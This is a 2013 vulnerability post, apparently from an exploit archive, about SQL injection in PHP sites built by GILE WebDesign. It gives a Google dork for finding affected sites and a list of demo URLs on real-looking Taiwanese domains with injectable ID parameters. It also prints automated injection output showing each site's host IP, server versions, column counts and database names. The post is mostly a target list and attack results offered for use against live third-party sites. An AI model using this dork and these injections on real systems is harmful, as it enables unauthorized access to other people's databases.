GILE WebDesign SQL Injection Vulnerability

2013.11.30

Credit: TUNISIAN CYBER

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\"Design by GILE\" inurl:php

X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: TUNISIAN CYBER
[+] Exploit Title: GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04
###############################################
Demos:
http://www.lufaXda.com.tw/product_list.php?CateId=1'
http://www.yafXod.com.tw/prodcate.php?CateId=3'
http://www.pXr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.giXe.com.tw/work_list.php?Cate=2'
Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: &#227;&#8364;&#338;&#229;&#229;&#188;&#230;&#8211;&#8225;&#229;&#338;&#8211;&#175;&#8364;-&#230;&#732;&#376;&#229;&#8230;&#8240;&#8211;&#402;&#232;&#8364;&#8364;&#227;&#8364;&#229;&#227;&#8364;&#230;&#8211;&#229;&#185;&#227;&#8364;&#230;&#187;&#229;&#8249;&#8226;
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile
#############################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

GILE WebDesign SQL Injection Vulnerability

Dork: intext:\"Design by GILE\" inurl:php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.